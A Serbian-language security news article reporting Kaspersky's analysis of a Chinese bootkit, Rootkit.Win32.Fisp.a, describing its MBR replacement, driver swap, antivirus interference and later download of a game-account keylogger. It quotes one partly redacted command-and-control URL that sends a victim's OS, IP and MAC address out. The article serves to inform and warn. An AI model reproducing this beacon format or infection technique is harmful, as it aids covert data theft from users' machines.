Pratite nas preko RSS-aNovi kineski bootkit - Rootkit.Win32.Fisp.a
Opisi virusa, 12.04.2011, 09:27 AM
Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.
Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.
Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.
Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):
Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a
Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.
Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.
Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.
Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:
http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=
none&g=none&k=a&h=62&i=2&j=0321-01
Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.
Šematski prikaz infekcije
Izdvojeno
Novi malver Storm krade podatke pregledača i preuzima naloge bez lozinke
Novi kradljivac informacija pod nazivom Storm pojavio se početkom 2026. na forumima ya sajber kriminal, donoseći promenu u načinu krađe podataka. ... Dalje
Lažni Claude AI instalater širi PlugX malver na Windows sistemima
Lažni instalater za Claude AI koristi se za širenje PlugX malvera na Windows sistemima, upozoravaju istraživači iz kompanije Malwarebytes. Prema n... Dalje
Infinity Stealer cilja macOS: lažni CAPTCHA navodi korisnike da sami pokrenu malver
Nova infostealer pod nazivom Infinity Stealer cilja korisnike macOS-a, kombinujući socijalni inženjering i napredne tehnike izbegavanja detekcije. I... Dalje
Tiha oluja: novi kradljivac lozinki Storm menja pravila igre
Istraživači iz Varonisa otkrili su novu varijantu infostealer malvera pod nazivom Storm, koja prikuplja kredencijale pregledača, kolačiće sesije... Dalje
Malver DeepLoad kombinuje ClickFix i AI-generisani kod za izbegavanje detekcije
Nova kampanja malvera, nazvana DeepLoad, kombinuje socijalni inženjering i tehnike izbegavanja generisane veštačkom inteligencijom kako bi kompromi... Dalje
Pratite nas
Nagrade
Prijatelji
